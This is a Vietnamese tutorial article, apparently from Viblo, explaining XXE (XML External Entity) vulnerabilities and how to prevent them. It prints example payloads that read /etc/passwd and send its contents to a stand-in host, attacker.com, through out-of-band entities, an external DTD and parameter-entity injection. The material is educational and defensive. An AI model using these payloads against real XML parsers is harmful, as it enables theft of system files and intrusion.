+1

Lỗ Hổng XXE: Nguy Cơ Tiềm Ẩn Từ XML External Entity

Giới Thiệu

Trong các ứng dụng hiện đại, XML (eXtensible Markup Language) được sử dụng rộng rãi để trao đổi dữ liệu giữa các hệ thống khác nhau. Tuy nhiên, việc xử lý không an toàn các tài liệu XML có thể dẫn đến một trong những lỗ hổng bảo mật nghiêm trọng nhất hiện nay: XML External Entity (XXE). XXE cho phép kẻ tấn công chèn và thực thi các thực thể XML bên ngoài, gây ra các hậu quả nghiêm trọng như đánh cắp dữ liệu, tấn công từ chối dịch vụ, và thậm chí là chiếm quyền kiểm soát hệ thống.

Cách Thức Hoạt Động

Lỗ hổng XXE xảy ra khi một ứng dụng xử lý các tài liệu XML có chứa các thực thể bên ngoài mà không kiểm tra cẩn thận. Một thực thể XML là một đoạn mã có thể được định nghĩa bên trong tài liệu XML và được tham chiếu bởi tên. Kẻ tấn công có thể chèn các thực thể XML độc hại vào tài liệu XML được xử lý bởi ứng dụng, như trong ví dụ sau:

<!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

Trong ví dụ này, thực thể xxe được định nghĩa để đọc nội dung của tệp /etc/passwd trên hệ thống. Khi ứng dụng xử lý tài liệu XML này mà không có biện pháp phòng ngừa, nội dung của tệp /etc/passwd sẽ được trả về cho kẻ tấn công.

Các Kiểu Tấn Công XXE

 1. In-band XXE

Đây là kiểu tấn công XXE phổ biến nhất, trong đó kết quả của việc thực thi thực thể bên ngoài được trả về trực tiếp cho kẻ tấn công trong phản hồi của ứng dụng. Ví dụ:

<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

 1. Out-of-band XXE (OOB-XXE)

Khi phản hồi trực tiếp không khả thi, kẻ tấn công có thể lợi dụng OOB-XXE để gửi kết quả của thực thể bên ngoài đến một máy chủ mà họ kiểm soát. Ví dụ:

<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "http://attacker.com/?data=file:///etc/passwd" >
]>
<foo>&xxe;</foo>

 1. DTD Retrieval

Kẻ tấn công có thể lợi dụng khả năng truy xuất DTD (Document Type Definition) từ các nguồn bên ngoài để chèn các thực thể độc hại vào tài liệu XML:

<!DOCTYPE foo SYSTEM "http://attacker.com/malicious.dtd">
<foo>&xxe;</foo>

 1. Parameter Entity Injection

Kẻ tấn công sử dụng các thực thể tham số trong DTD để thực hiện tấn công:

<!DOCTYPE foo [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?%file;'>">
 %eval;
 %exfil;
]>

Hậu Quả Của XXE

 1. Đánh cắp dữ liệu: Kẻ tấn công có thể truy cập và lấy cắp các tệp tin nhạy cảm trên hệ thống như tệp cấu hình, thông tin người dùng, và các dữ liệu bí mật khác.
 2. Tấn công từ chối dịch vụ (DoS): Bằng cách tạo ra các thực thể XML phức tạp hoặc vô hạn, kẻ tấn công có thể làm cho hệ thống xử lý XML bị quá tải và ngừng hoạt động.
 3. Tấn công Server-Side Request Forgery (SSRF): Kẻ tấn công có thể sử dụng XXE để gửi các yêu cầu HTTP đến các dịch vụ nội bộ hoặc từ xa, từ đó lợi dụng các lỗ hổng khác hoặc thu thập thông tin về hệ thống mạng nội bộ.
 4. Chiếm quyền điều khiển hệ thống: Trong một số trường hợp, XXE có thể được sử dụng để thực thi mã độc trên hệ thống, cho phép kẻ tấn công chiếm quyền kiểm soát hệ thống.

Biện Pháp Phòng Chống

 1. Vô hiệu hóa thực thể bên ngoài: Cấu hình parser XML để vô hiệu hóa việc xử lý các thực thể bên ngoài.
 2. Sử dụng thư viện an toàn: Sử dụng các thư viện XML hiện đại và được cập nhật thường xuyên, hỗ trợ việc vô hiệu hóa thực thể bên ngoài.
 3. Kiểm tra và lọc đầu vào: Luôn kiểm tra và lọc dữ liệu đầu vào từ người dùng để đảm bảo chúng không chứa các đoạn mã XML độc hại.
 4. Áp dụng các biện pháp bảo mật bổ sung: Sử dụng các công cụ bảo mật như Web Application Firewall (WAF) để phát hiện và ngăn chặn các tấn công XXE.
 5. Kiểm tra bảo mật thường xuyên: Thực hiện kiểm tra bảo mật thường xuyên để phát hiện và khắc phục kịp thời các lỗ hổng bảo mật trong hệ thống.

All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.